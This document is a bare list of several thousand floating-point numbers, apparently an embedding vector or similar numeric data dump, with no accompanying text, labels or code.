-0.0026720305904746056, 0.0186688844114542, -0.03251807391643524, 0.010256730020046234, -0.023964600637555122, -0.0449540801346302, -0.02606206014752388, 0.01793997921049595, -0.039301346987485886, -0.014912794344127178, -0.03808154910802841, -0.0035255183465778828, -0.007434083614498377, -0.029914841055870056, 0.024381116032600403, -0.005678762216120958, 0.026017433032393456, -0.0009529684321023524, 0.025779424235224724, 0.03436264768242836, -0.020721718668937683, 0.011766603216528893, -0.017969731241464615, -0.01758296601474285, -0.007980762049555779, -0.01908540166914463, 0.014421898871660233, -0.02033495157957077, -0.04543009772896767, -0.01676480658352375, -0.005693637765944004, 0.03272633254528046, -0.0024172859266400337, -0.028501659631729126, -0.0431392565369606, -0.0038230305071920156, -0.03338085860013962, 0.0009176388848572969, -0.029022306203842163, -0.0047936635091900826, 0.042365722358226776, 0.0015675169415771961, 0.03284533694386482, -0.011915359646081924, 0.003971786703914404, -0.017716845497488976, 0.03111976571381092, -0.0358799584209919, -0.0031220177188515663, -0.011089763604104519, 0.019115151837468147, -0.0431392565369606, -0.03858732059597969, -0.024128232151269913, -0.011454216204583645, 0.02513977326452732, -0.06646420061588287, 0.012711204588413239, 0.05441496521234512, 0.002776159904897213, 0.0278173815459013, -0.00703616114333272, -0.05260013788938522, -0.03296434134244919, 0.036236975342035294, -0.023860471323132515, 0.016229284927248955, 0.03840881213545799, 0.0207514688372612, -0.02598768286406994, 0.003213130636140704, 0.011045136488974094, -0.015180555172264576, -0.015180555172264576, 0.042782239615917206, 0.0005857269279658794, -0.015872269868850708, -0.0013741339789703488, -0.0020844442769885063, 0.007285327650606632, 0.03989637270569801, 0.02058783732354641, 0.002941650804132223, -0.014377272687852383, 0.017032567411661148, -0.01390125323086977, 0.00011121838906547055, -0.002346626715734601, 0.0063779158517718315, -0.0013164910487830639, -0.006106435786932707, 0.02798101305961609, -0.02598768286406994, -0.02390509657561779, 0.03177429363131523, -0.04599536955356598, 0.0022053085267543793, -0.05170760303735733, 0.030911507084965706, 0.023354699835181236, -0.022030770778656006, 0.007069631479680538, 0.019323410466313362, -0.03421389311552048, -0.04355577006936073, 0.021286990493535995, -0.014905355870723724, 0.016392916440963745, -0.003599896328523755, 0.0038639383856207132, 0.028903299942612648, 0.00788407027721405, -0.0033172599505633116, 0.021361369639635086, 0.012621951289474964, -0.030405737459659576, 0.00570851331576705, -0.04682840406894684, 0.015902021899819374, -0.012205434031784534, 0.034570906311273575, -0.009453446604311466, 0.010308794677257538, 0.029319817200303078, -0.04498383030295372, -0.044686317443847656, -0.03692125156521797, 0.024202609434723854, -0.03900383785367012, -0.018207740038633347, -0.007921259850263596, -0.018817640841007233, 0.009565014392137527, 0.01783584989607334, 0.030941259115934372, 0.014221078716218472, -0.025333154946565628, -0.019368037581443787, 0.0010914974845945835, 0.013886377215385437, -0.014206202700734138, -0.0065452661365270615, -0.003945754375308752, -0.020543210208415985, 0.010301356203854084, -0.02390509657561779, -0.018906893208622932, -0.023443954065442085, -0.037486523389816284, 0.048762232065200806, 0.01078481413424015, -0.01464503351598978, 0.00036073342198506, 0.02057296223938465, 0.017865601927042007, 0.008278273977339268, -0.05022004246711731, 0.045846614986658096, -0.00755308847874403, 0.019189530983567238, -0.01727057807147503, -0.0034641565289348364, -0.015500380657613277, 0.013626053929328918, -0.016318539157509804, -0.028516534715890884, 0.0016400354215875268, -0.026448825374245644, 0.015247494913637638, 0.021852264180779457, -0.019933311268687248, 0.001506155007518828, 0.003512502182275057, 0.017910229042172432, 0.008969989605247974, 0.0072704521007835865, -0.008270836435258389, 0.03936085104942322, 0.0016772245289757848, -0.01835649646818638, -0.02722235769033432, 0.009222875349223614, 0.024753006175160408, -0.022967934608459473, -0.030494989827275276, -0.012309563346207142, 0.008077453821897507, -0.005887020844966173, -0.009728645905852318, 0.001549852080643177, -0.0025604635011404753, 0.003648242214694619, 0.03296434134244919, -0.02606206014752388, -0.011342648416757584, -0.009036930277943611, 0.02216465212404728, -0.01741933263838291, -0.006783275865018368, 0.019546544179320335, 0.015797892585396767, -0.03021235391497612, 0.01883251592516899, -0.0035385345108807087, -0.0284570325165987, -0.01199717540293932, -0.011312897317111492, 0.017404457554221153, 0.004328801296651363, -0.02000768855214119, 0.025080271065235138, -0.02092997543513775, 0.009765834547579288, 0.004511027131229639, 0.02566041797399521, 0.03427339345216751, -0.02406872808933258, 0.028263648971915245, -0.00950551126152277, -0.012949214316904545, -0.027103353291749954, 0.01700281724333763, -0.007943573407828808, -0.008441905491054058, -0.028233898803591728, 0.03394613042473793, -0.01485329121351242, 0.0509340725839138, 0.039717864245176315, -0.027757879346609116, 0.03079250268638134, 0.010569117031991482, 0.022030770778656006, -0.0053031533025205135, -0.012785582803189754, 0.014087198302149773, 0.007117976900190115, -0.010271605104207993, 0.03028673119843006, -0.02082584798336029, -0.0009520387393422425, 0.04724492132663727, -0.00904436782002449, -0.02116798609495163, 0.0025455879513174295, -0.010725311003625393, -0.010606306605041027, 0.02646370232105255, -0.010695559903979301, -0.03742702305316925, -0.028754545375704765, -0.011930235661566257, 0.044359054416418076, 0.013246726244688034, -0.004168888553977013, -0.000885563378687948, -0.014139262959361076, -0.020468832924962044, -0.016660677269101143, 0.0021365087013691664, -0.01004103384912014, -0.01774659752845764, 0.025333154946565628, 0.031060263514518738, -0.008679915219545364, 0.022863805294036865, 0.005715951323509216, -0.03727826476097107, 0.009542700834572315, 0.012822771444916725, 0.036236975342035294, -0.014592968858778477, 0.012190558016300201, 0.03403538465499878, -0.021941518411040306, -0.010546804405748844, -0.01480866502970457, -0.02548191137611866, 0.006411385722458363, -0.032339565455913544, 0.010271605104207993, 0.02017132006585598, -0.01062862016260624, -0.02173325978219509, -0.03608821704983711, 0.008211334235966206, 0.0073411110788583755, -0.0157681405544281, 0.04944651201367378, -0.0027538463473320007, -0.020602712407708168, -0.0016976784681901336, -0.004008975345641375, -0.014131824485957623, 0.011506280861794949, 0.01843087561428547, -0.009996406733989716, 0.0014578093541786075, 0.00207514688372612, 0.026850467547774315, -0.01419132761657238, 0.004682096652686596, 0.003949473146349192, -0.028531409800052643, -0.019159778952598572, -0.025928178802132607, 0.011506280861794949, 0.009617079049348831, -0.003979224245995283, 0.02082584798336029, -0.04706641286611557, -0.007315078750252724, 0.00962451659142971, -0.005318028852343559, -0.0031889579258859158, -0.028903299942612648, -0.03519568219780922, 0.018951520323753357, 0.005808923859149218, -0.020721718668937683, -0.027772754430770874, 0.0035887397825717926, -0.0042283907532691956, -0.011610410176217556, 0.003871376160532236, 0.0000026039572276204126, 0.011364961974322796, 0.01099307183176279, -0.0002468420716468245, 0.007653499022126198, -0.021554751321673393, 0.0020044876728206873, -0.006976658944040537, -0.017612716183066368, -0.012078991159796715, -0.016794558614492416, 0.023295197635889053, -0.0257347971200943, -0.0218373890966177, -0.018148237839341164, -0.003484610468149185, 0.012108742259442806, 0.019814306870102882, 0.016378041356801987, 0.00674236798658967, 0.005080019123852253, -0.023369574919342995, -0.03965836390852928, 0.015783017501235008, 0.008404716849327087, 0.0014773334842175245, -0.0168540608137846, -0.001802737358957529, 0.015887146815657616, 0.014340083114802837, 0.038706324994564056, -0.019323410466313362, 0.015470629557967186, -0.019739927724003792, -0.020037440583109856, -0.01850525289773941, -0.03983686864376068, 0.011223644018173218, 0.019725052639842033, -0.019784554839134216, -0.001632597646676004, 0.024589374661445618, 0.032161056995391846, 0.02341420203447342, -0.03418413922190666, -0.01406488474458456, 0.027594247832894325, -0.0006935750716365874, -0.024544747546315193, 0.002610668772831559, -0.003713322803378105, 0.0165862999856472, 0.002517696237191558, 0.005812642630189657, -0.013075657188892365, 0.012049240060150623, 0.01585739478468895, 0.014050008729100227, -0.015031798742711544, 0.0057233888655900955, 0.002011925680562854, 0.0006038565770722926, -0.009312128648161888, -0.017240826040506363, -0.03483866527676582, 0.017553213983774185, -0.012012051418423653, -0.011945110745728016, 0.04066990315914154, 0.019219281151890755, -0.021807637065649033, -0.044537562876939774, 0.008694791235029697, -0.03852781653404236, 0.04200870916247368, 0.02109360881149769, -0.005463066045194864, 0.032071802765131, -0.01360374130308628, 0.025273652747273445, 0.01062862016260624, 0.019025899469852448, -0.017062319442629814, 0.050755564123392105, -0.01436239667236805, -0.014005382545292377, -0.013008716516196728, 0.02490176260471344, 0.020230822265148163, -0.00541843893006444, -0.00975095946341753, 0.0007949151331558824, 0.0027947542257606983, -0.044775571674108505, -0.05251088738441467, 0.00016049382975324988, -0.02566041797399521, 0.0022555135656148195, 0.013670681044459343, -0.010531928390264511, 0.046114373952150345, -0.0022685297299176455, -0.01799948140978813, 0.012190558016300201, 0.006604768801480532, 0.005165553651750088, -0.002465631579980254, 0.01033854577690363, -0.02173325978219509, -0.036058466881513596, 0.008962552063167095, -0.057568591088056564, 0.021763009950518608, 0.012837647460401058, -0.020439080893993378, -0.010650932788848877, -0.029572702944278717, 0.007638623006641865, 0.00019919364422094077, -0.0019338286947458982, 0.02356295846402645, -0.00577173475176096, -0.0028189271688461304, -0.037813786417245865, 0.02515464834868908, -0.020022563636302948, 0.04364502429962158, 0.005422158166766167, 0.006723773665726185, -0.03097100928425789, 0.0218373890966177, -0.037903040647506714, -0.007184917107224464, -0.019963061437010765, -0.02430673874914646, -0.017865601927042007, -0.010613744147121906, 0.005678762216120958, -0.030256981030106544, -0.0007567963912151754, -0.002069568494334817, 0.007742752321064472, 0.030822252854704857, 0.0246488768607378, 0.027698377147316933, -0.003901127493008971, 0.020558085292577744, -0.023934848606586456, 0.010941007174551487, 0.02000768855214119, -0.01917465403676033, 0.028338028118014336, -0.011171579360961914, -0.02125724032521248, -0.020230822265148163, 0.013016154058277607, -0.008389840833842754, 0.00916337314993143, -0.027014099061489105, -0.009423695504665375, -0.015173117630183697, -0.025957930833101273, -0.025779424235224724, 0.011357524432241917, 0.018951520323753357, -0.01625903695821762, -0.013931004330515862, -0.002454474801197648, -0.0396881140768528, -0.03180404379963875, 0.016630927100777626, -0.010115411132574081, 0.045489601790905, -0.028680166229605675, -0.002352205105125904, -0.013432671315968037, -0.007590277586132288, 0.0165862999856472, -0.01153603196144104, -0.004815977066755295, 0.014927669428288937, 0.016318539157509804, -0.017895352095365524, -0.028501659631729126, -0.01186329498887062, 0.0001119737935368903, 0.04031288996338844, 0.015500380657613277, -0.014183889143168926, 0.020602712407708168, -0.023934848606586456, -0.012071553617715836, -0.006370477844029665, 0.018118487671017647, -0.024589374661445618, -0.00018536398420110345, -0.03260732814669609, 0.015076425857841969, 0.013804561458528042, -0.014050008729100227, -0.006113873794674873, 0.005422158166766167, 0.004912668373435736, 0.0094683226197958, -0.017969731241464615, -0.0078394440934062, -0.020974602550268173, -0.034481652081012726, 0.0058349561877548695, 0.014206202700734138, 0.06000819057226181, -0.02671658620238304, -0.02249191515147686, -0.013380606658756733, 0.014466525986790657, -0.006035776808857918, -0.016868935897946358, -0.016541672870516777, -0.008255960419774055, 0.007906383834779263, 0.0030718124471604824, 0.016645802184939384, -0.015470629557967186, 0.028858674690127373, 0.008189020678400993, 0.03460065647959709, -0.02430673874914646, 0.004563091788440943, -0.018877143040299416, -0.02223902940750122, -0.03302384167909622, -0.003276352072134614, 0.012183120474219322, 0.006322131957858801, -0.027445491403341293, 0.007713001221418381, 0.03701050579547882, -0.0012746533611789346, 0.00726673286408186, -0.03296434134244919, -0.05105307698249817, 0.013507049530744553, -0.01078481413424015, -0.013990506529808044, -0.02589842863380909, -0.0013825015630573034, 0.0008362879161722958, -0.026359573006629944, -0.040045127272605896, 0.00950551126152277, 0.00651179626584053, 0.01274095568805933, -0.0008381473599001765, -0.004641188774257898, 0.0023429077118635178, 0.0022164650727063417, -0.016571424901485443, -0.013008716516196728, -0.0065452661365270615, 0.008612975478172302, -0.024366240948438644, -0.0003783981956075877, -0.027162855491042137, 0.0035701452288776636, 0.015574758872389793, 0.029528075829148293, 0.0358799584209919, -0.0254670362919569, -0.0026999223046004772, -0.026924844831228256, -0.03195279836654663, -0.01094844564795494, -0.0018296993803232908, 0.02167375572025776, -0.005686200223863125, 0.002101179212331772, -0.0025641825050115585, -0.004563091788440943, 0.00777994142845273, 0.02341420203447342, 0.027177730575203896, -0.004310206510126591, 0.01768709532916546, 0.027832256630063057, -0.031238770112395287, 0.038706324994564056, 0.00013852906704414636, 0.02995946817100048, -0.006006025709211826, 0.0024581938050687313, -0.014667346142232418, -0.021792761981487274, -0.016318539157509804, -0.029111558571457863, -0.007370862178504467, 0.02142087183892727, 0.012212871573865414, 0.005057705566287041, 0.03977736830711365, 0.0028189271688461304, 0.029840463772416115, -0.02107873186469078, -0.008449343964457512, 0.004752755630761385, 0.00008158339915098622, -0.013678118586540222, 0.04191945493221283, -0.017642468214035034, -0.0072704521007835865, 0.029022306203842163, 0.03394613042473793, 0.00006554563151439652, 0.009981530718505383, -0.005381250288337469, 0.027862008661031723, 0.015530131757259369, 0.04081866145133972, -0.024753006175160408, 0.004492432810366154, 0.011461653746664524, 0.032071802765131, 0.015485504642128944, 0.005358936730772257, 0.008055140264332294, 0.009579889476299286, 0.014711973257362843, -0.024053853005170822, 0.014459088444709778, 0.0014857010683044791, -0.017880477011203766, 0.012183120474219322, 0.05221337452530861, -0.005396125838160515, -0.018118487671017647, -0.022060522809624672, 0.018624257296323776, 0.005968836601823568, 0.0020528335589915514, 0.03320235013961792, 0.02524390257894993, -0.0050725811161100864, -0.006567579694092274, 0.005649011116474867, 0.07610359787940979, -0.02613643743097782, -0.0018250508001074195, -0.003800717182457447, -0.003092266386374831, -0.0030606556683778763, 0.008821234107017517, -0.006839059293270111, -0.004094510339200497, -0.03180404379963875, 0.02258116938173771, 0.008568348363041878, -0.01719619892537594, -0.005887020844966173, -0.01660117506980896, 0.024500122293829918, -0.03144703060388565, 0.011461653746664524, 0.00761630991473794, 0.020453957840800285, 0.0036147721111774445, -0.025437284260988235, 0.0037300579715520144, -0.005600665230304003, -0.013990506529808044, -0.005009360145777464, -0.010241854004561901, -0.0010347842471674085, 0.016407791525125504, -0.02524390257894993, 0.009773272089660168, -0.029409071430563927, -0.049327507615089417, 0.00900717917829752, -0.005682480987161398, 0.010018720291554928, 0.00008785904356045648, -0.006117592565715313, -0.021063856780529022, -0.0123244384303689, -0.01049473974853754, -0.014295456930994987, -0.008397279307246208, 0.0007916610920801759, 0.01053936593234539, 0.07015335559844971, 0.021688632667064667, -0.024217484518885612, -0.024024102836847305, -0.02705872617661953, -0.01527724601328373, 0.03284533694386482, 0.000059153771871933714, 0.014183889143168926, -0.010866629891097546, 0.020067190751433372, -0.014369834214448929, -0.022298531606793404, -0.0017887915018945932, -0.004165169317275286, 0.0008623202447779477, 0.02414310723543167, -0.006307256408035755, 0.010933569632470608, 0.026776088401675224, -0.009661705233156681, 0.010569117031991482, 0.022105149924755096, -0.0007368072983808815, -0.002196011133491993, -0.023354699835181236, 0.015664011240005493, -0.012361628003418446, -0.014414461329579353, -0.015500380657613277, 0.015976399183273315, -0.017627591267228127, -0.014139262959361076, 0.012785582803189754, 0.005816361401230097, -0.014830978587269783, 0.038319557905197144, 0.0012365346774458885, 0.003739355131983757, -0.04200870916247368, 0.01825236715376377, -0.000137599345180206, -0.00322614680044353, -0.01539625134319067, -0.009408820420503616, -0.009646830148994923, 0.037159260362386703, -0.002080725273117423, -0.005686200223863125, -0.024351365864276886, -0.023741465061903, -0.024336490780115128, 0.013142596930265427, 0.023607585579156876, -0.0019970498979091644, -0.0007670233608223498, 0.006426261272281408, 0.00891792494803667, 0.007660936564207077, -0.025957930833101273, -0.0009511089883744717, 0.01285996101796627, 0.022967934608459473, 0.004611437674611807, 0.021867139264941216, 0.003994099795818329, -0.016497045755386353, 0.009981530718505383, -0.010331107303500175, 0.013722745701670647, 0.018654009327292442, -0.006664271000772715, 0.023473704233765602, 0.00007867800741223618, 0.008672477677464485, 0.03260732814669609, -0.01899614743888378, 0.0010608165757730603, -0.016868935897946358, 0.015262370929121971, 0.030004095286130905, 0.01924903318285942, 0.005860988516360521, -0.012041802518069744, -0.004291612189263105, 0.010799689218401909, 0.010018720291554928, 0.01067324634641409, -0.008278273977339268, -0.01991843432188034, -0.010018720291554928, 0.0028877267614006996, 0.034481652081012726, 0.016571424901485443, -0.0022927026730030775, 0.009877401404082775, -0.008040264248847961, -0.024753006175160408, -0.021599378436803818, -0.02740086428821087, 0.01320209912955761, 0.00593164749443531, 0.021361369639635086, -0.005146959330886602, -0.0017041865503415465, 0.01785072684288025, 0.02566041797399521, 0.011788916774094105, 0.019040774554014206, -0.026924844831228256, -0.019769679754972458, -0.032994091510772705, 0.014310332015156746, -0.028516534715890884, -0.011402151547372341, -0.015902021899819374, -0.008099767379462719, 0.01727057807147503, 0.010093098506331444, -0.02665708400309086, -0.045935869216918945, -0.01593177393078804, -0.01539625134319067, -0.003573864232748747, -0.007218387443572283, 0.010398047976195812, -0.006939469836652279, -0.019397789612412453, 0.0318932980298996, 0.03180404379963875, 0.04617387801408768, 0.011067450046539307, -0.0002109314373228699, -0.004168888553977013, 0.032399069517850876, 0.014466525986790657, 0.007713001221418381, -0.012711204588413239, -0.011387275531888008, 0.00195986102335155, -0.02015644498169422, 0.03808154910802841, 0.016913563013076782, 0.020855598151683807, -0.00023545294243376702, -0.01999281346797943, 0.005291996523737907, 0.000009762115951161832, -0.0034529997501522303, 0.011112077161669731, -0.003486469853669405, -0.003136893268674612, 0.0014754740986973047, 0.009237750433385372, 0.015991276130080223, -0.009966655634343624, 0.011781479232013226, -0.017463959753513336, -0.015753265470266342, -0.007608871906995773, 0.0056155407801270485, 0.026285193860530853, 0.00420979643240571, 0.0009515738347545266, -0.024589374661445618, 0.006359321065247059, 0.030152851715683937, -0.046114373952150345, -0.0284570325165987, -0.014183889143168926, 0.012978965416550636, 0.02258116938173771, -0.022045645862817764, -0.021941518411040306, 0.005232493858784437, 0.01825236715376377, -0.031328022480010986, -0.038884833455085754, 0.020022563636302948, 0.004046164453029633, -0.01527724601328373, 0.01154346950352192, -0.018892018124461174, 0.0018231912981718779, 0.0529274046421051, -0.02241753600537777, 0.004462681710720062, -0.0227448008954525, -0.0177614726126194, 0.01349217351526022, 0.007400613743811846, 0.026686836034059525, -0.012681453488767147, -0.037724535912275314, -0.007218387443572283, -0.01941266469657421, 0.01065837126225233, 0.010621181689202785, -0.003997819032520056, 0.0014847713755443692, -0.016660677269101143, 0.013276477344334126, 0.0007721369038335979, -0.0029342130292207003, 0.00022685297881253064, -0.03436264768242836, 0.01752346195280552, -0.017701970413327217, -0.01509873941540718, -0.004708128981292248, -0.010546804405748844, -0.0000328018722939305, 0.009594765491783619, 0.02189689129590988, 0.0011937672970816493, 0.0034622971434146166, 0.01125339511781931, -0.04456731304526329, 0.017240826040506363, 0.01123852003365755, -0.00888817384839058, -0.0015284684486687183, -0.005318028852343559, -0.006154781673103571, -0.014563217759132385, -0.004451524931937456, 0.049684520810842514, 0.011803792789578438, 0.0008311744313687086, 0.027445491403341293, 0.004358552396297455, 0.009810461662709713, 0.010517052374780178, 0.008739418350160122, 0.007188636343926191, -0.019278783351182938, -0.009230312891304493, -0.006318413186818361, 0.0029267752543091774, -0.024276986718177795, 0.01393844187259674, -0.005299434531480074, -0.009267501533031464, -0.002049114555120468, -0.03180404379963875, -0.0002854256599675864, 0.014027695171535015, 0.02042420580983162, 0.0010980055667459965, -0.008903049863874912, -0.010822002775967121, 0.01585739478468895, -0.0124583188444376, 0.006712616886943579, -0.015812767669558525, 0.03272633254528046, -0.006712616886943579, -0.006783275865018368, 0.0017292890697717667, 0.001252340036444366, 0.020870473235845566, -0.008107204921543598, -0.021435746923089027, 0.016898687928915024, -0.019814306870102882, 0.0245596244931221, -0.008471657522022724, 0.009401381947100163, -0.006667989771813154, -0.0012746533611789346, -0.006534109357744455, 0.010308794677257538, 0.02017132006585598, -0.006444856058806181, -0.01835649646818638, 0.0007572612958028913, 0.007240701001137495, -0.01494254544377327, -0.015604509972035885, 0.008575785905122757, -0.009899714961647987, 0.02557116560637951, 0.0029435104224830866, -0.0338866300880909, -0.013983068987727165, -0.003648242214694619, -0.011848419904708862, -0.018698636442422867, -0.017300328239798546, -0.017806099727749825, 0.017032567411661148, -0.0020379580091685057, -0.00195986102335155, -0.011469091288745403, 0.013990506529808044, -0.005440752487629652, -0.03168503940105438, 0.03260732814669609, 0.0009148496901616454, -0.0020714281126856804, 0.004351114388555288, 0.0015889005735516548, 0.010509614832699299, 0.012651702389121056, -0.002867272822186351, 0.02026057429611683, 0.016229284927248955, -0.017806099727749825, 0.005875864066183567, -0.0033042437862604856, 0.04406154155731201, -0.009609640575945377, -0.019963061437010765, -0.000746104575227946, -0.000014599592759623192, 0.005649011116474867, 0.002740830183029175, -0.001322069438174367, 0.010308794677257538, -0.008746855892241001, 0.007817130535840988, 0.00415401253849268, 0.006065527908504009, -0.02076634392142296, -0.024381116032600403, -0.0009641251526772976, 0.008211334235966206, 0.010851753875613213, -0.02756449580192566, 0.014161575585603714, 0.03230981528759003, 0.008836109191179276, 0.01320209912955761, 0.02323569543659687, -0.002947229193523526, -0.030762750655412674, -0.0020268012303858995, 0.010152600705623627, -0.00438086548820138, -0.021212613210082054, -0.018163112923502922, 0.0050874571315944195, 0.001461528241634369, 0.0011733133578673005, 0.006076684687286615, -0.018624257296323776, 0.009661705233156681, -0.0007433153805322945, -0.019234158098697662, -0.02107873186469078, -0.014845853671431541, -0.012755831703543663, -0.010732749477028847, 0.00963195413351059, -0.005080019123852253, 0.014622719958424568, 0.007742752321064472, -0.0023559238761663437, 0.00846421904861927, -0.03460065647959709, 0.00784688163548708, 0.015649136155843735, 0.0079733245074749, -0.013916128315031528, -0.012956651858985424, 0.006853934843093157, -0.020781220868229866, -0.011141828261315823, -0.010405485518276691, 0.02189689129590988, -0.025333154946565628, 0.0038602196145802736, -0.009840212762355804, 0.016303664073348045, -0.017553213983774185, 0.0070547559298574924, 0.007300203200429678, -0.01261451281607151, -0.00755308847874403, 0.043377265334129333, 0.01344754733145237, -0.010219540446996689, 0.0032187090255320072, 0.012488070875406265, -0.016794558614492416, 0.01123852003365755, -0.009565014392137527, -0.0072704521007835865, -0.02267042174935341, 0.023845594376325607, 0.023533206433057785, -0.0014392148004844785, -0.0022629513405263424, 0.004455243702977896, 0.017731720581650734, 0.004339957609772682, 0.013216975145041943, 0.018862267956137657, -0.022209279239177704, 0.002119773766025901, 0.007452677935361862, 0.006790713872760534, -0.020022563636302948, 0.01302359253168106, 0.010851753875613213, -0.01600615121424198, -0.008821234107017517, -0.0045556542463600636, 0.046203628182411194, 0.011305459775030613, 0.01917465403676033, 0.006623363122344017, 0.017449084669351578, 0.0007312289671972394, -0.012183120474219322, -0.007106820121407509, -0.020781220868229866, 0.019323410466313362, -0.0028821483720093966, 0.013678118586540222, 0.001170524163171649, 0.0022759675048291683, -0.010100536048412323, -0.022030770778656006, 0.000588051276281476, -0.010345983318984509, 0.005526287481188774, -0.020900225266814232, -0.012807896360754967, 0.044031791388988495, -0.0013964474201202393, 0.03287508711218834, 0.013112845830619335, 0.0207514688372612, -0.010152600705623627, 0.006355602294206619, 0.0112831462174654, -0.007861757650971413, -0.0062328786589205265, -0.0003137823077850044, 0.0026924845296889544, 0.012406254187226295, -0.0011035839561372995, 0.004648626782000065, -0.002030520001426339, -0.017791222780942917, 0.013008716516196728, -0.0039383163675665855, -0.007809692528098822, -0.01743420958518982, 0.013745059259235859, -0.0068725296296179295, 0.004027570132166147, 0.0023968317545950413, -0.011796355247497559, -0.0034901888575404882, 0.028352903202176094, 0.006753524765372276, -0.00858322437852621, -0.00622172188013792, 0.012755831703543663, -0.021763009950518608, 0.02307206392288208, 0.0014457228826358914, -0.0009301902027800679, 0.012555010616779327, 0.000740061339456588, -0.026270318776369095, 0.006950626615434885, -0.019546544179320335, 0.019278783351182938, -0.012555010616779327, 0.0020584119483828545, -0.009728645905852318, 0.01419132761657238, 0.002063990104943514, -0.017716845497488976, 0.00020860711811110377, 0.0047936635091900826, -0.00605809036642313, -0.0070510366931557655, 0.00742664560675621, -0.006601049564778805, -0.004072196781635284, -0.003871376160532236, 0.018787888810038567, 0.014964859001338482, 0.028442157432436943, 0.01390125323086977, 0.022893555462360382, 0.0019394069677218795, -0.01332854200154543, -0.012495508417487144, 0.02399435080587864, -0.0005285488441586494, 0.014377272687852383, 0.007121696136891842, 0.011379837989807129, 0.011074887588620186, -0.016154907643795013, -0.009557575918734074, 0.0034957672469317913, 0.00949807371944189, -0.03367837145924568, 0.024693503975868225, 0.011149265803396702, -0.010115411132574081, 0.008806358091533184, 0.030494989827275276, -0.00011534404620761052, 0.018981272354722023, -0.015076425857841969, -0.012071553617715836, 0.03477916494011879, 0.008493970148265362, -0.007750190328806639, -0.013254163786768913, -0.005678762216120958, -0.005745702423155308, -0.00311086094006896, 0.011885608546435833, 0.0006926453788764775, 0.017895352095365524, -0.014719410799443722, -0.0024321614764630795, 0.006348164286464453, -0.0064374180510640144, 0.007203511893749237, -0.01112695224583149, -0.0023819562047719955, 0.011937673203647137, -0.006006025709211826, -0.006597330793738365, -0.008099767379462719, 0.014548341743648052, -0.0053254663944244385, -0.001106373150832951, -0.0028003326151520014, -0.015180555172264576, -0.024857135489583015, 0.006738649215549231, -0.04081866145133972, -0.01924903318285942, 0.013075657188892365, -0.006593612022697926, -0.017211075872182846, 0.009579889476299286, -0.029602454975247383, -0.005875864066183567, 0.0025028204545378685, -0.00651179626584053, -0.001448512077331543, -0.004220952745527029, -0.026671959087252617, -0.0056415731087327, 0.02348858118057251, -0.0036854310892522335, 0.008352652192115784, -0.027936385944485664, 0.003036482958123088, 0.006244035437703133, 0.0017869321163743734, 0.019903559237718582, 0.01716644875705242, 0.014161575585603714, -0.012242622673511505, 0.0007409910904243588, 0.032399069517850876, 0.0009292604518122971, -0.007493586279451847, 0.003510642796754837, -0.009475760161876678, -0.011506280861794949, 0.0013648368185386062, -0.004570529796183109, 0.0032484603580087423, -0.0009074119152501225, -0.004767631646245718, 0.015173117630183697, -0.018862267956137657, 0.009832775220274925, -0.006478325929492712, -0.009029492735862732, 0.008821234107017517, -0.01020466536283493, -0.004592842888087034, 0.016378041356801987, -0.018579630181193352, -0.029840463772416115, -0.003302384400740266, 0.015128490515053272, 0.0002626474015414715, -0.02058783732354641, -0.011982300318777561, -0.005455628037452698, -0.005957679823040962, -0.014057447202503681, -0.018401123583316803, 0.009609640575945377, 0.015887146815657616, -0.01158065814524889, 0.01211618073284626, -0.012763269245624542, 0.0055932276882231236, 0.0064560123719275, 0.001094286679290235, 0.04001537710428238, 0.0031908173114061356, -0.012793020345270634, -0.024500122293829918, 0.0030959853902459145, -0.01286739856004715, 0.004098229110240936, 0.013335979543626308, 0.0022982810623943806, 0.006244035437703133, 0.0031703633721917868, -0.0027966138441115618, -0.011342648416757584, -0.018654009327292442, 0.001935688080266118, 0.009609640575945377, -0.010531928390264511, 0.009096432477235794, 0.016140030696988106, 0.0042655798606574535, 0.007705563213676214, -0.009200561791658401, 0.025794299319386482, -0.018698636442422867, 0.00680930819362402, 0.021763009950518608, -0.020320076495409012, 0.00830058753490448, 0.001954282633960247, 0.021138234063982964, -0.0018362074624747038, 0.019353162497282028, 0.004072196781635284, 0.0013955177273601294, -0.013298790901899338, -0.027534745633602142, 0.013841750100255013, -0.010844316333532333, -0.02167375572025776, 0.004782507196068764, 0.004484994802623987, -0.018877143040299416, 0.009557575918734074, -0.008769169449806213, 0.006188251543790102, 0.02067709155380726, 0.01482354011386633, 0.017463959753513336, 0.008940238505601883, -0.046025123447179794, -0.009111308492720127, -0.01959117129445076, -0.010182351805269718, 0.01924903318285942, 0.02265554666519165, -0.0018706073751673102, 0.01709206961095333, 0.0015424143057316542, 0.0005020516691729426, 0.013209537602961063, 0.012220309115946293, -0.006020901259034872, 0.0415029376745224, 0.01285996101796627, 0.0069059995003044605, 0.02265554666519165, 0.006757243536412716, 0.006753524765372276, 0.015827644616365433, -0.012986402958631516, -0.005392407067120075, -0.015783017501235008, -0.0069431886076927185, -0.001965439412742853, 0.005336623173207045, 0.016497045755386353, 0.009260063990950584, -0.0016047059325501323, -0.023429077118635178, -0.013120283372700214, 0.009907153435051441, -0.006537828594446182, 0.014169014059007168, -0.021614253520965576, 0.011439340189099312, -0.00031099311308935285, 0.02499101683497429, 0.0010933569865301251, -0.004927544388920069, -0.010122849605977535, -0.0033228383399546146, 0.013752496801316738, -0.011186455376446247, 0.004403179045766592, -0.007359705399721861, 0.0011091623455286026, 0.012064116075634956, 0.014756600372493267, -0.018445750698447227, -0.006950626615434885, 0.0036203505005687475, 0.00024753937032073736, 0.002614387543871999, 0.010851753875613213, 0.015225181356072426, -0.0029081807006150484, 0.007144009228795767, 0.001486630761064589, 0.0014122527791187167, 0.010412923991680145, -0.00009884142491500825, 0.0009283307008445263, -0.0077650658786296844, 0.0019840337336063385, -0.022358033806085587, 0.014176451601088047, -0.00021430168999359012, -0.004101947881281376, -0.01439958531409502, 0.007943573407828808, -0.011781479232013226, -0.0025325717870146036, -0.0005397055647335947, 0.01112695224583149, 0.020141569897532463, 0.00025567447301000357, 0.023786092177033424, 0.0002254583960166201, -0.000023475564375985414, 0.0002561393193900585, 0.02341420203447342, -0.018906893208622932, -0.025630667805671692, 0.005370093509554863, 0.029111558571457863, 0.008285712450742722, 0.012785582803189754, -0.015887146815657616, -0.0057233888655900955, -0.012012051418423653, -0.01585739478468895, 0.012956651858985424, -0.023934848606586456, 0.016333414241671562, 0.013864063657820225, 0.03204205259680748, 0.0103757344186306, 0.016913563013076782, -0.010100536048412323, -0.012361628003418446, -0.009200561791658401, -0.010301356203854084, 0.010695559903979301, 0.0021495248656719923, 0.020528335124254227, 0.010093098506331444, 0.0001711856748443097, -0.0006749805761501193, 0.028442157432436943, 